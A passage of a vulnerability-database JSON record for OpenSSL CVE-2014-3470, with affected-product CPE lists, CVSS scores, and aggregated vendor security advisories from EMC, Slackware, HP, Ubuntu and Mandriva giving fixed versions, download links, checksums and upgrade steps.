"cpe:2.3:a:redhat:storage:2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mariadb:mariadb:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.0.13", "versionStartIncluding": "10.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3470" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127265" } ], "trust": 0.5 }, "cve": "CVE-2014-3470", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 4.3, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2014-3470", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3470", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201406-081", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-3470", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3470" }, { "db": "JVNDB", "id": "JVNDB-2014-002767" }, { "db": "CNNVD", "id": "CNNVD-201406-081" }, { "db": "NVD", "id": "CVE-2014-3470" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. OpenSSL is prone to a denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. \nOpenSSL prior to 0.9.8za, 1.0.0m, and 1.0.1h are vulnerable. As long as all other products which SMH V7.3.3.1 for Linux\nx86 communicates with have been upgraded to the latest versions, it will not\nbe vulnerable to the exploits described in CVE-2014-0224. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nESA-2014-079: EMC Documentum Content Server Multiple Vulnerabilities \n\nEMC Identifier: ESA-2014-079\n\nCVE Identifier: See below for individual CVEs\n\nSeverity Rating: CVSS v2 Base Score: See below for individual CVSS score for each CVE\n\nAffected products: \n\\x95\tAll EMC Documentum Content Server versions of 7.1 prior to P07\n\\x95\tAll EMC Documentum Content Server versions of 7.0\n\\x95\tAll EMC Documentum Content Server versions of 6.7 SP2 prior to P16\n\\x95\tAll EMC Documentum Content Server versions of 6.7 SP1\n\\x95\tAll EMC Documentum Content Server versions prior to 6.7 SP1\n \nSummary: \nEMC Documentum Content Server contains fixes for multiple vulnerabilities which also include vulnerabilities disclosed by the OpenSSL project on June 5, 2014 in OpenSSL. \n\nDetails: \nEMC Documentum Content Server may be susceptible to the following vulnerabilities:\n\n\\x95\tArbitrary Code Execution (CVE-2014-4618):\nAuthenticated non-privileged users can potentially execute Documentum methods with higher level privileges (up to and including superuser privileges) due to improper authorization checks being performed on user-created system objects. \nCVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)\n\n\\x95\tDQL Injection (CVE-2014-2520):\nCertain DQL hints in EMC Documentum Content Server may be potentially exploited by an authenticated non-privileged malicious user to conduct DQL injection attacks and read the database contents. This issue only affects Content Server running on Oracle database. \nCVSS v2 Base Score: 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N)\n\n\\x95\tInformation Disclosure (CVE-2014-2521):\nAuthenticated non-privileged users are allowed to retrieve meta-data of unauthorized system objects due to improper authorization checks being performed on certain RPC commands in Content Server. \nCVSS v2 Base Score: 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N)\n\n\\x95\tMultiple OpenSSL vulnerabilities (See individual CVEs below and refer to NVD for each of their scores):\n\tSSL/TLS Man-in-the-middle (MITM) vulnerability (CVE-2014-0224)\n\tDTLS recursion flaw (CVE-2014-0221)\n\tDTLS invalid fragment vulnerability (CVE-2014-0195)\n\tSSL_MODE_RELEASE_BUFFERS NULL pointer deference (CVE-2014-0198)\n\tSSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298)\n\tAnonymous ECDH denial of service (CVE-2014-3470)\n\tFLUSH + RELOAD cache side-channel attack (CVE-2014-0076)\nFor more information about these vulnerabilities, please visit the original OpenSSL advisory https://www.openssl.org/news/secadv_20140605.txt \n\nResolution: \nThe following versions contain the resolution for these issues: \n\\x95\tEMC Documentum Content Server version 7.1 P07 and later\n\\x95\tEMC Documentum Content Server version 7.0: Hotfixes are available for Windows \u0026 Linux. Contact EMC Support to obtain them. For Solaris and AIX, contact EMC Support to open Hotfix requests. \n\\x95\tEMC Documentum Content Server version 6.7 SP2 P16 and later\n\\x95\tEMC Documentum Content Server version 6.7 SP1: Hotfixes are available for Windows \u0026 Linux. Contact EMC Support to obtain them. For Solaris and AIX, contact EMC Support to open Hotfix requests. \n\nEMC recommends all customers to upgrade to one of the above versions at the earliest opportunity. \n\nLink to remedies:\nRegistered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server\n\nFor Hotfix, contact EMC Support. \n\n\n\nRead and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. \n\nFor an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. \n\nEMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] openssl (SSA:2014-156-03)\n\nNew openssl packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1h-i486-1_slack14.1.txz: Upgraded. \n For more information, see:\n http://www.openssl.org/news/secadv_20140605.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n (* Security fix *)\npatches/packages/openssl-solibs-1.0.1h-i486-1_slack14.1.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8za-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8za-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8za-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8za-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8za-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8za-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1h-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1h-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1h-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1h-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1h-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1h-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1h-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1h-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1h-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1h-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1h-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1h-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n634b8ecc8abc6d3f249b73d0fefa5959 openssl-0.9.8za-i486-1_slack13.0.txz\na2529f1243d42a3608f61b96236b5f60 openssl-solibs-0.9.8za-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n2ddac651c5f2531f3a7f70d9f5823bd6 openssl-0.9.8za-x86_64-1_slack13.0.txz\nd7ffeb15713a587f642fbb3d5c310c75 openssl-solibs-0.9.8za-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n0b84a6a1edf76cba83d4c52c54196baa openssl-0.9.8za-i486-1_slack13.1.txz\ndfd5d241b0e1703ae9d70d6ccda06179 openssl-solibs-0.9.8za-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\nbd749622577a5f76a59d90b95aa922fd openssl-0.9.8za-x86_64-1_slack13.1.txz\n35cf911dd9f0cc13f7f0056d9e1f4520 openssl-solibs-0.9.8za-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n8f674defac9002c81265d284b1072f75 openssl-0.9.8za-i486-1_slack13.37.txz\n48ce79e7714cb0c823d2b6ea4a88ba51 openssl-solibs-0.9.8za-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\nefa09162c22782c15806bca99472c5be openssl-0.9.8za-x86_64-1_slack13.37.txz\n8e3b8d1e3d3a740bd274fbe38dc10f96 openssl-solibs-0.9.8za-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\n8e2698d19f54c7e0cac8f998df23b782 openssl-1.0.1h-i486-1_slack14.0.txz\ncf6233bc169cf6dd192bb7210f779fc1 openssl-solibs-1.0.1h-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n2b4f0610d5e46fa7bb27a0b39f0d6d33 openssl-1.0.1h-x86_64-1_slack14.0.txz\n18fdd83dcf86204275508a689a017dea openssl-solibs-1.0.1h-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n49aea7da42eef41da894f29762971863 openssl-1.0.1h-i486-1_slack14.1.txz\n6f19f4fdc3f018b4e821c519d7bb1e5c openssl-solibs-1.0.1h-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nccf5ff2b107c665a4f3bf98176937749 openssl-1.0.1h-x86_64-1_slack14.1.txz\nea1aaba38c98b096186ca94ca541a793 openssl-solibs-1.0.1h-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\ndb1ed7ded71ab503f567940fff39eb16 a/openssl-solibs-1.0.1h-i486-1.txz\n0db4f91f9b568b2b2629950e5ab88b22 n/openssl-1.0.1h-i486-1.txz\n\nSlackware x86_64 -current packages:\nd01aef33335bee27f36574241f54091f a/openssl-solibs-1.0.1h-x86_64-1.txz\n95a743d21c58f39573845d6ec5270656 n/openssl-1.0.1h-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1h-i486-1_slack14.1.txz openssl-solibs-1.0.1h-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04355095\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04355095\nVersion: 1\n\nHPSBMU03062 rev.1 - HP Insight Control server deployment on Linux and Windows\nrunning OpenSSL, Multiple Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-08-08\nLast Updated: 2014-08-08\n\nPotential Security Impact: Remote denial of service (DoS), code execution,\nunauthorized access, disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP System\nManagement Homepage (SMH), HP Smart Update Manager (SUM), and HP Version\nControl Agent (VCA) running on Linux and Windows. These components of HP\nInsight Control server deployment could be exploited remotely resulting in\ndenial of service (DoS), code execution, unauthorized access, or disclosure\nof information. \n\nHP Insight Control server deployment packages HP System Management Homepage\n(SMH) and HP Version Control Agent (VCA), and HP Smart Update Manager (SUM)\nand deploys them through the following components. This bulletin provides the\ninformation needed to update the HP Insight Control server deployment\nsolution. \n\nInstall HP Management Agents for Windows x86/x64\nInstall HP Management Agents for RHEL 5 x64\nInstall HP Management Agents for RHEL 6 x64\nInstall HP Management Agents for SLES 10 x64\nInstall HP Management Agents for SLES 11 x64\nUpgrade Proliant Firmware\n\nReferences:\n\nCVE-2010-5298 Remote Denial of Service\nCVE-2014-0076 Unauthorized Disclosure of Information\nCVE-2014-0195 Remote Unauthorized Access\nCVE-2014-0198 Remote Denial of Service\nCVE-2014-0221 Remote Denial of Service (DoS)\nCVE-2014-0224 Remote Unauthorized Access or Disclosure of Information\nCVE-2014-3470 Remote Code Execution or Unauthorized Access\nSSRT101628\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2, v7.3.1\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0\nCVE-2014-0076 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0221 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-3470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following updates to v7.3.1 of HP Insight Control server\ndeployment to resolve this vulnerability. HP has provided manual update steps\nif a version upgrade is not possible; if users wish to remain at v7.1.2,\nv7.2.0, or v7.2.1. \n\nNote: It is important to check your current running version of HP Insight\nControl server deployment and to follow the correct steps listed below. For\nHP Insight Control server deployment v7.2.2, users must upgrade to v7.3.1 and\nfollow the steps below to remove the vulnerability. The vulnerability known\nas Heartbleed (CVE-2014-0160) was fixed in HP Insight Control server\ndeployment v7.3.1. That Security Bulletin with instructions on how to upgrade\nto v7.3.1 can be found here:\n\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\na-c04267749\n\nHP Insight Control server deployment users of v7.1.2, v7.2.0, v7.2.1 should\ntake the following steps to remove this vulnerability. \n\nDelete the files smhamd64-*.exe/smhx86-*.exe\" from Component Copy Location\nlisted in the following table, rows 1 and 2. \nDelete the files \"vcax86-*.exe/vcaamd64-*.exe from Component Copy Location\nlisted in the following table, rows 3 and 4. \nDelete the files hpsmh-7.*.rpm\" from Component Copy Location listed in row 5. \nIn sequence, perform the steps from left to right in the following table. \nFirst, download components from Download Link; Second, rename the component\nas suggested in Rename to. Third, copy the component to the location\nspecified in Component Copy Location. \nTable Row Number\n Download Link\n Rename to\n Component Copy Location\n\n1\n http://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba\n smhamd64-ccp023716.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n2\n http://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05\n smhx86-cp023715.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n3\n http://www.hp.com/swpublishing/MTX-8aefeaf490284a7691eca97d13\n vcax86-cp023742.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n4\n http://www.hp.com/swpublishing/MTX-c0d32bac154a4d93839d8cd1f2\n vcaamd64-cp023743.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n5\n http://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93\n Do not rename the downloaded component for this step. \n \\\\express\\hpfeatures\\hpagents-sles11-x64\\components\n\\\\express\\hpfeatures\\hpagents-sles10-x64\\components\n\\\\express\\hpfeatures\\hpagents-rhel5-x64\\components\n\\\\express\\hpfeatures\\hpagents-rhel6-x64\\components\n\nDownload and extract the HPSUM 5.3.6 component from\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p750586112/v99793\n\nCopy all content from extracted ZIP folder and paste into\n\\\\eXpress\\hpfeatures\\fw-proLiant\\components\nInitiate Install HP Management Agents for SLES 11 x64 on targets running\nSLES11 x64. \nInitiate Install HP Management Agents for SLES 10 x64 on targets running\nSLES10 x64. \nInitiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL\n6 x64. \nInitiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL\n5 x64. \nInitiate Install HP Management Agents for Windows x86/x64 on targets running\nWindows. \n\nHP Insight Control server deployment users with v7.2.2:\n\nPlease upgrade to Insight Control server deployment v7.3.1 and follow the\nsteps below for v7.3.1. \n\nHP Insight Control server deployment users with v7.3.1:\n\nPerform steps 1 - 4 as outlined above for users with HP Insight Control\nserver deployment v7.1.2, v7.2.0, and v7.2.1. \nDownload the HP SUM ZIP file from\nhttp://www.hp.com/swpublishing/MTX-f6c141a7feeb4a358bbb28300f\n\nExtract the contents from the HP SUM ZIP file to\n\\\\eXpress\\hpfeatures\\fw-proLiant\\components location on the Insight Control\nserver deployment server\n\nRelated security bulletins:\n\nFor System Management Homepage please see Security bulletin HPSBMU03051 https\n://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04\n345210\n\nFor HP Version Control Agent please see Security bulletin HPSBMU03057 https:/\n/h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c0434\n9897\n\nHISTORY\nVersion:1 (rev.1) - 8 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (GNU/Linux)\n\niEYEARECAAYFAlPk9ewACgkQ4B86/C0qfVn1/gCfR2U/mZZXYwPms9ptZcBTua/5\nMoQAn1qlQ3kmLRs7YFN5GzwBTRfSK5Go\n=r0qe\n-----END PGP SIGNATURE-----\n. ============================================================================\nUbuntu Security Notice USN-2232-2\nJune 12, 2014\n\nopenssl regression\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 13.10\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-2232-1 introduced a regression in OpenSSL. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) cryptographic library and tools\n\nDetails:\n\nUSN-2232-1 fixed vulnerabilities in OpenSSL. The upstream fix for\nCVE-2014-0224 caused a regression for certain applications that use\ntls_session_secret_cb, such as wpa_supplicant. This update fixes the\nproblem. \n\nOriginal advisory details:\n\n J=C3=BCri Aedla discovered that OpenSSL incorrectly handled invalid DTLS\n fragments. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and\n Ubuntu 14.04 LTS. (CVE-2014-0195)\n Imre Rad discovered that OpenSSL incorrectly handled DTLS recursions. (CVE-2014-0221)\n KIKUCHI Masashi discovered that OpenSSL incorrectly handled certain\n handshakes. A remote attacker could use this flaw to perform a\n man-in-the-middle attack and possibly decrypt and modify traffic. \n (CVE-2014-0224)\n Felix Gr=C3=B6bert and Ivan Fratri=C4=87 discovered that OpenSSL incorrectly handled\n anonymous ECDH ciphersuites. This issue only\n affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. \n (CVE-2014-3470)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.3\n\nUbuntu 13.10:\n libssl1.0.0 1.0.1e-3ubuntu1.5\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.15\n\nAfter a standard system update you need to reboot your computer to make all\nthe necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2232-2\n http://www.ubuntu.com/usn/usn-2232-1\n https://launchpad.net/bugs/1329297\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.3\n https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.5\n https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.15\n. \n \n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before\n 1.0.1h does not properly restrict processing of ChangeCipherSpec\n messages, which allows man-in-the-middle attackers to trigger use of a\n zero-length master key in certain OpenSSL-to-OpenSSL communications,\n and consequently hijack sessions or obtain sensitive information,\n via a crafted TLS handshake, aka the CCS Injection vulnerability\n (CVE-2014-0224). \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n http://www.openssl.org/news/secadv_20140605.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n ef1687f8f4d68dd34149dbb04f3fccda mes5/i586/libopenssl0.9.8-0.9.8h-3.18mdvmes5.2.i586.rpm\n 3e46ee354bd0add0234eaf873f0a076c 